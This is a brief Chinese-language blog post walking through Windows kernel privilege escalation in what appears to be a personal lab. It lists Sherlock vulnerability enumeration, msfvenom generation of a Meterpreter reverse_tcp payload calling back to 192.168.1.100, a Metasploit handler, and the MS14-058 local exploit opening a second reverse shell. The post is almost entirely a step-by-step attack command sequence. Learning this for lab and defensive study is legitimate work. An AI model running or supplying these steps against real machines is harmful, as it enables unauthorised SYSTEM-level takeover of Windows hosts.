windows内核提权 - whale3070's blog

参考资料：

github项目lpeworkshop
youtubu视频

【windows】

1
2
3

powershell -nop -ep bypass
Import-Module C:\Users\whale\Desktop\Tools\Sherlock\Sherlock.ps1
Find-AllVulns

【kali】

msfconsole
handler -H 192.168.1.100 -P 4444 -p windows/x64/meterpreter/reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

【windows】
拷贝payload.exe并运行

【kali】

sessions -i 1
run migrate -n explorer.exe
getuid  【win-u8oiu3qm15c\whale】
background
use exploit/windows/local/ms14_058_track_popup_menu
show options
set session 1
show target
set target 1
set payload generic/shell_reverse_tcp
set lhost 192.168.1.100
set lport 4455
run
whoami

在b站上传了演示视频

windows

binpath本地提权 Previous

查找与修改exp Next